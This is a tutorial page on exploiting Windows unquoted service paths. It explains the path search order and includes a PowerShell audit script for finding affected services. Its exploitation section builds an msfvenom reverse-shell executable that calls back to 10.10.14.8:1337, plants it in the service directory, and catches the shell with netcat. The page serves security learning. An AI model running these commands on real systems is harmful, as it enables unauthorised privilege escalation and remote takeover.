Unquoted Service Paths
Overview
Unquoted service path exploitation is similar to binary path exploitation; however, the vulnerability lies in the fact that the path to the service executable is unquoted.
When the service is started, Windows walks the path one space-separated word at a time and tests each prefix with .exe appended:
C:\Program.exe - NO
C:\Program Files.exe - NO
C:\Program Files\Unquoted.exe - NO
C:\Program Files\Unquoted Path.exe - NO
And so on...
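A defender's view of the search order above, as an added example that is not part of the original page: the PowerShell function lists the earlier candidate paths for an unquoted service path, and the audit loop reports affected services on the local host. The function name and the sample paths are constructed for illustration.

```powershell
# Added example, not from the original page. Names and sample paths are constructed.
function Get-UnquotedPathCandidates {
    param([string]$ImagePath)

    $p = $ImagePath.Trim()
    if ($p.StartsWith('"')) { return @() }       # quoted path: nothing to guess

    # Keep the executable part only; text after the first ".exe" is arguments.
    $m = [regex]::Match($p, '^(.*?\.exe)(\s|$)', 'IgnoreCase')
    if (-not $m.Success) { return @() }
    $exe = $m.Groups[1].Value

    # Every space yields one candidate tried before the real binary:
    # the prefix up to that space with ".exe" appended.
    $candidates = @()
    for ($i = 0; $i -lt $exe.Length; $i++) {
        if ($exe[$i] -eq ' ') { $candidates += $exe.Substring(0, $i) + '.exe' }
    }
    return $candidates
}

# Constructed sample ImagePath values (not taken from a real host).
$samples = @(
    'C:\Program Files\Unquoted Path Service\Common Files\service.exe',
    '"C:\Program Files\Quoted Service\service.exe" -run',
    'C:\Windows\system32\svchost.exe -k netsvcs'
)
foreach ($s in $samples) {
    $c = @(Get-UnquotedPathCandidates $s)
    '{0} -> {1} candidate(s)' -f $s, $c.Count
    $c | ForEach-Object { "    $_" }
}

# Audit of the local host (Windows only): report affected services and whether
# a candidate file already exists, which deserves investigation.
if (Get-Command Get-CimInstance -ErrorAction SilentlyContinue) {
    Get-CimInstance Win32_Service | ForEach-Object {
        foreach ($c in @(Get-UnquotedPathCandidates $_.PathName)) {
            [pscustomobject]@{
                Service   = $_.Name
                RunsAs    = $_.StartName
                Candidate = $c
                Exists    = Test-Path -LiteralPath $c
            }
        }
    }
}
```

Wrapping the executable path in double quotes in the service's ImagePath value removes the ambiguity, so a remediated service no longer appears in the audit output.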
Exploitation via PowerUp
Run PowerUp and look for the Unquoted Service Paths section in its output

Create and drop a malicious executable
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=1337 -f exe -o Common.exe
cp C:\temp\Common.exe "C:\Program Files\Unquoted Path Service\Common.exe"
Start a listener and the service
nc -lnvp 1337
sc start unquotedsvc